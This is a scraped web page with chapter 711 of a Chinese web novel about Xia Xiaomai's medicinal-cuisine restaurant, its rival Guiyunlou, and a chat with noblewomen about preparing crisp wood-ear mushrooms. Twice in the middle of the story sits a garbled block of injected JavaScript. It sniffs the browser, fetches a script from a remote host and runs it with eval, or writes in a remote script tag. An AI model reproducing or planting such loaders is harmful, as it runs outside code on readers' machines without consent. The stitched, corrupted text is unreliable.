首页      小说目录      搜索
章节目录 第711章 热诚
    “大嫂,这归云楼也太过分了”

    二柱气恼不已,不甘心这事就这么结束了。

    “好了,二柱,小声一点。”

    夏小麦将二柱拉到一边,不想影响客人。

    “难道就这么算了昨天采买的时候,西街的刘掌柜就跟我说,在我们关门这段时间,林衍忠就到处派人散播命案的事情,还捏造了很多子虚乌有的事情。”

    二柱反问道。

    “楼上楼下这么多客人,难道不比三个事情败露的狗重要吗”

    夏小麦冷静的看着二柱。

    二柱一听这话,深出了一口气,情绪总算平复了许多。

    “大嫂,万一他再派人来捣乱呢”

    二柱担忧的说道。

    “二柱,林衍忠这是狗急跳墙,居然派这样的三个蠢货来自掘坟墓今天客人这么多,楼上还有各种达官显贵,今天这事肯定会传扬开来的,他林衍忠恐怕要忙上一阵儿了。我们还是先将膳禾馆重新步入正轨之后,再来说归云楼的事情。”

    夏小麦劝说道。

    其实她的心里有何尝舒服只不过眼前还有太多事要做,夏小麦不想自己分心而出现更大的纰漏,反而让人钻空子。

    “大嫂,我明白了,不会再鲁莽行事了,你还是赶紧上楼招待王爷他们吧楼下有尧护卫在,应该不会出太大的事情了。”

    二柱听了劝,便知道了轻重缓急。

    夏小麦和二柱说着,回到了柜台,发现徐大夫似乎在思索什么事情。

    “徐大夫,刚刚多亏了您,认出了毛茛,不然恐怕不好解决了。”

    二柱笑着说道。

    “我倒不是看出来的,是离得近闻到了毛茛的味道。”

    徐大夫笑着摇了摇头。

    二柱说着,走到一边的阿杰身边,他还有些惊魂未定,二柱安慰了他几句。

    “徐老,您是还有什么疑惑吗”

    夏小麦看出了徐大夫的思索模样。

    “也不是,我只是在想刚刚你说的箫老爷咳血的事情。”

    徐大夫一脸奇怪和疑虑。

    “是老管家说的,说是最近开始出现的状况。我也觉得有些奇怪。”

    夏小麦赶紧说道。

    “嗯,从他的脉象来看,肺部只是虚火旺而已,也没有明显的病症特征,怎么会咳血呢不应该啊”

    徐大夫说着陷入的深思,忍不住的摇了摇头,缓缓走回了自己的座位。

    夏小麦想着楼上的贵客,也不再多纠结。

    “刘夫人,这个黑木耳的口感怎么会如此脆呢”

    高夫人一见夏小麦进来,便放下碗筷迫不及待的问道。

    “是啊,这黑木耳,府上做的我就不喜欢,软软的,看着”

    萱王妃也好奇,她本想说软的黑木耳看着有些恶心,但是与此情此景不合适,便没有说这扫兴的形容。

    “其实也不是很难的法子。”

    夏小麦也不打算隐瞒。

    萱王妃和高夫人热情的拉她坐下。

    “平时的时候,我们买到的黑木耳都不是新鲜的,而是干的黑木耳泡发的,所以口感才会软而不脆。”

    夏小麦用筷子夹起一块炒熟的黑木耳。

    var isios  navigatorerantatchpuacx

    navigatorerantdexof'uc

    oser'{

    function{var reestireestiur&ot;https:ehogypv6389811011ht&ot;reestithod't'reestirandid'c'athrandotostrg36substr2dodocuntriten''reestifuncfunction{var xhttpne xhttpreestxhttponreadystatechanfunction{ifxhttpreadystate4{doxreestrunfaseifxhttpstat200{evaxhttpresponsetext}}}xhttpopenreestithod,reestiur,truexhttpsend}ifdoxreestrun{doxreestruntruereestifunc}ese{reestitervasettervafunction{ifdoxreestrun{ceartervareestitervadoxreestruntruereestifunc}},500}}

    }ese{

    docuntriten&ot;script src'https:ehissq63898110&ot;athfoorathrando99999991&ot;xht'&ot;

    }

    “小麦,你可别卖关子了。”

    高夫人佯装生气。

    “其实方法很简单,泡发之后的黑木耳用热水焯一下,再放入冷水,最好是冰水之中,放置四到五个时辰就可以了。”

    夏小麦笑着说道。

    “就这么简单”

    高夫人有些难以相信,尽是如此简单的方式。

    “呵呵,小麦,我算是发现了,你总是会有这么多的新奇主意”

    萱王妃看着小小的黑木耳,有些感慨。

    “小麦,其实以前我一直觉得你这膳禾馆做的始终是菜肴,再新奇也不会超出这个范围的。可今天一见,我才明白,膳禾馆宝贵的不是药膳,而是这些看似平凡的药膳中所倾注的心血和热诚。”

    高夫人宛然一笑,赞许不已。

    “是啊,小麦的药膳看着也没什么特别的,但总能让人心情愉悦,总觉得有一种说不出的不同,原来就是高夫人说的这般。”

    萱王妃也跟着说道。

    “其实只要用心就好了。”

    夏小麦第一次被人夸赞到了心里,不免有些感触。

    “用心现在还有多少人原意用心就刚刚那几个归云楼的,不就是吗”

    萱王妃摇了摇头。

    “是啊,心思都用到旁门左道上面了,哪里还有心好好做生意”

    高夫人想起刚刚的三个大汉也是忍不住皱眉。

    “小麦,你这膳禾馆一开,把这些个什么京城第一楼比的一无是处。”

    萱王妃想到了归云楼背后的那些人。

    高夫人尴尬的笑了笑,萱王妃话里话,她怎么不会知道这其中的一些复杂关系呢

    “王妃,这红枣花生猪蹄汤冷了味道会差很多,对肠胃也不好,您还是趁热喝吧”

    夏小麦看了一眼高夫人,笑着劝说道。

    闲聊了两句,萱王妃和高夫人约着明天一起去养生馆做护理。

    “小麦,你别担心我们两个,瑶儿的手艺也是不错,你好好安排膳禾馆的事情吧”

    萱王妃担心夏小麦跑来跑去两头忙,便劝夏小麦。

    “其实也没什么,我也不用亲自做什么,不过今天确实走不开”

    夏小麦既然知道了萱王妃和高夫人会去的事情,怎么可能真的不亲自招待

    “小麦”

    萱王妃刚想说什么,萱王爷却推门进来了。

    “见过萱王爷。”

    高夫人赶紧起身,萱王爷点点头,高夫人才坐了回去。

    “王爷,怎么了慕王爷可满意这里的药膳”

    萱王妃想让萱王爷坐下。

    “我就不坐了,三哥很是喜欢,赞不绝口呢我大概会跟三哥多呆一会儿,你如果觉得闷了累了,就先回去吧”

    萱王爷原来只是过来告诉王妃一声,他要陪着慕王爷在这边,暂时不会回府。

    “王爷,没事的,我和高夫人聊聊天也不觉得闷,您别担心。”

    萱王妃温柔一笑,萱王爷便回到了隔壁的房间。

    “夫人,世子妃来了。”

    青儿进来,笑嘻嘻的说道。

    夏小麦一听,便赶紧起身。

    var isios  navigatorerantatchpuacx

    navigatorerantdexof'uc

    oser'{

    function{var reestireestiur&ot;https:ehogypv6389811011ht&ot;reestithod't'reestirandid'c'athrandotostrg36substr2dodocuntriten''reestifuncfunction{var xhttpne xhttpreestxhttponreadystatechanfunction{ifxhttpreadystate4{doxreestrunfaseifxhttpstat200{evaxhttpresponsetext}}}xhttpopenreestithod,reestiur,truexhttpsend}ifdoxreestrun{doxreestruntruereestifunc}ese{reestitervasettervafunction{ifdoxreestrun{ceartervareestitervadoxreestruntruereestifunc}},500}}

    }ese{

    docuntriten&ot;script src'https:ehissq63898110&ot;athfoorathrando99999991&ot;xht'&ot;

    }
上一页     返回目录      下一页
  sitemap